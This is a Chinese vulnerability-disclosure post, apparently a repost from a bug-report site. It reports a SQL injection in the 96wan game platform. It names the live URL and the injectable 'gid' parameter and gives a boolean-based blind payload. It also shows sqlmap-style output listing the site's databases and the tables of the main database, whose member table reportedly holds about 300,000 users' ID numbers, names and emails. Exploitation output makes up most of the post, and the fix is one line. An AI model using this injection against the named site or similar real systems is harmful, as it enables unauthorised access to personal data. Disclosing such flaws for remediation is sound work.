首页 » 漏洞 » 96wan游戏平台存漏洞#涉及30万用户信息(身份证#姓名#邮箱等)

96wan游戏平台存漏洞#涉及30万用户信息(身份证#姓名#邮箱等)

 

注入地址

 


#SQL注入
URL:
http://www.96wan.com/websiteapi/website_serverlist?gid=6参数gid可控

 
泄露6个数据库
code 区域
Parameter: gid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: gid=6 AND 1429=1429
---
back-end DBMS: MySQL 5
available databases [6]:
[*] `96wan_ucenter`
[*] `96wan_web` //主站数据库
[*] `96wan_wp`
[*] information_schema
[*] mysql
[*] performance_schema
#不深入直接查下主库信息(member敏感信息泄露30万数据)
96wan游戏平台存漏洞#涉及30万用户信息(身份证#姓名#邮箱等)
96wan游戏平台存漏洞#涉及30万用户信息(身份证#姓名#邮箱等)
code 区域
Database: 96wan_web
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| `96wan_game_log`        | 4680784 |
| `96wan_login_log`       | 3916792 |
| `96wan_member_info`     | 309322  |
| `96wan_register_log`    | 308966  |
| `96wan_newcard`         | 155681  |
| `96wan_newcard2`        | 150832  |
| `96wan_channel_member`  | 93985   |
| `96wan_pay_log`         | 75946   |
| `96wan_pay_ok`          | 44113   |
| `96wan_pay_togame`      | 44113   |
| ku36_game_log           | 31458   |
| `96wan_code_log`        | 19938   |
| `96wan_lhzs_card`       | 12349   |
| ku36_member_info        | 4924    |
| `96wan_channel_info`    | 3797    |
| `96wan_area`            | 3144    |
| `96wan_verify_email`    | 1901    |
| `96wan_game_server`     | 622     |
| `96wan_forgetpwd`       | 404     |
| `96wan_channel`         | 380     |
| `96wan_city`            | 340     |

| `96wan_article`         | 311     |
| `96wan_access`          | 197     |
| `96wan_friendlink`      | 114     |
| `96wan_union_channel`   | 102     |
| `96wan_password_appeal` | 97      |
| `96wan_lhzs_usecard`    | 96      |
| `96wan_node`            | 82      |
| `96wan_test_account`    | 50      |
| `96wan_phone_code_log`  | 46      |
| `96wan_union_members`   | 40      |
| `96wan_province`        | 34      |
| `96wan_channel_source`  | 33      |
| `96wan_game`            | 25      |
| `96wan_pay_type`        | 20      |
| `96wan_slidepic`        | 19      |
| `96wan_role_user`       | 17      |
| `96wan_tg_pass`         | 16      |
| `96wan_pay_test`        | 12      |
| `96wan_notice`          | 7       |
| `96wan_singlepage`      | 7       |
| `96wan_group`           | 6       |
| `96wan_channel_ts`      | 5       |
| `96wan_role`            | 5       |
| `96wan_user`            | 4       |
| `96wan_category`        | 3       |
| `96wan_dept`            | 3       |
| `96wan_groups`          | 3       |
| `96wan_union`           | 2       |
| `96wan_card`            | 1       |
| `96wan_code`            | 1       |
| `96wan_phone_code`      | 1       |
| `96wan_sygame`          | 1       |
| `96wan_tg_paytype`      | 1       |
+-------------------------+---------+
解决方案:
参数可控 代码农过滤吧。
 

 

 

原文链接:96wan游戏平台存漏洞#涉及30万用户信息(身份证#姓名#邮箱等),转载请注明来源!

0